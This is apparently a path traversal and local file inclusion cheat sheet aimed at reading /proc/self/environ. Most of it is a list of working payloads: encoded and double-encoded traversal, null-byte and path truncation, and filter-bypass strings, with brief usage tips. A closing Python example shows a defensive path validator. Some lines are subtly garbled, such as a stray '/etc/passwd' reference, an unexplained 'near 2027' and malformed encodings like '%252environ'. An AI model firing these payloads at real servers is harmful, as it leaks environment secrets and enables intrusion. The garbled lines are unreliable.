
/proc/self/environ

../../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../..//./proc/./self/./environ
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fself%2fenviron
../../../../../../../../../proc/self//./environ
../../../../../../../../../proc/self//./////environ
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2fself%2f%2f%2e%2fenviron

Sequences stripped non-recursively

....//....//....//....//....//....//....//....//....//proc/self/environ
....\/....\/....\/....\/....\/....\/....\/....\/....\/proc/self/environ
URL encoding
%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/proc/self/environ

Null byte

../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00

Encoding
You could use non-standard encodings like double URL encoding (and others):

..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fproc%252fself%252environ
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afproc%c0%afself%c0%afenviron
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fproc%252fself%252environ
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fproc%252fself%252environ%00

From existent folder

Maybe the back-end is checking the folder path:
utils/scripts/../../../../../../../../../../proc/self/environ

It is possible to adapt this technique to find directories at any location in the file system. For instance, under the same hypothesis (current directory at depth 3 of the file system), if you want to check whether /var/www/ contains a private directory, use the following payload:
../../../var/www/private/../../../proc/self/environ
Path truncation
../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../../../../../../../../proc///self//environ
../../../../../../../../../../../../../../../../../../../../../../../../proc/./self/./environ
../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ/
../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ/.

Always try to start the path with a fake directory (a/).

This vulnerability was corrected in PHP 5.3.
a/../../../../../../../../../proc/self/environ..\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
a/../../../../../../../../../proc/self/environ/./././././././././././././././././././././././././././././././././././././././././././././.

With the next options, by trial and error, you have to discover how many "../" are needed to delete the appended string but not "/etc/passwd" (near 2027):

a/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././proc/self/environ
a/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ

Filter bypass tricks

....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//proc/self/environ
..///////..////..//////..///////..////..//////..///////..////..//////..///////..////..//////..///////..////..//////proc/self/environ
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../proc/self/environ
Maintain the initial path: /var/www/../../proc/self/environ
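Taken together, the non-recursive stripping, URL/double encoding, null byte and backslash cases above all defeat a filter that edits the string instead of canonicalising the path. The following example, added here and not part of the original cheat sheet, contrasts that kind of one-pass filter with a validator that decodes, normalises and confines the result to a document root before any file is opened; WEBROOT, weak_filter and safe_resolve are names chosen for this example.

```python
import os
import urllib.parse

# Assumed document root for this example (hypothetical, not from the page).
WEBROOT = "/var/www/html"


def weak_filter(user_path):
    """The check the page calls 'stripped non-recursively': one pass of
    removing '../', so '....//' collapses back into '../'."""
    return user_path.replace("../", "")


def safe_resolve(user_path, base=WEBROOT):
    """Decode, canonicalise and confine a user-supplied path to `base`.
    Returns the resolved absolute path, or None when it must be rejected."""
    decoded = user_path
    try:
        # 1. Percent-decode until stable (bounded) so %252f or %2e%2e cannot hide
        #    a traversal one layer down; overlong UTF-8 such as %c0%af is rejected.
        for _ in range(3):
            nxt = urllib.parse.unquote(decoded, errors="strict")
            if nxt == decoded:
                break
            decoded = nxt
    except UnicodeDecodeError:
        return None
    # 2. A NUL byte truncates the path in C-based file APIs (the %00 trick).
    if "\x00" in decoded:
        return None
    # 3. Treat backslashes as separators so ..\ and %5c.. cannot dodge a '/'-only rule.
    decoded = decoded.replace("\\", "/")
    # 4. Join under base, resolve '.', '..', '//' and symlinks, then require containment.
    root = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed inputs in the style of the page's payload list.
    for s in ["images/logo.png",
              "....//....//....//proc/self/environ",
              "..%252f..%252f..%252fproc%252fself%252fenviron",
              "%5c..%5c..%5c..%5c/proc/self/environ",
              "../../../proc/self/environ%00"]:
        print(f"{s!r:50} weak={weak_filter(s)!r:40} safe={safe_resolve(s)!r}")
```

Note that the `....//` form is not rejected by safe_resolve: once canonicalised it is simply a non-existent name under the document root, whereas weak_filter turns it into a live traversal.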
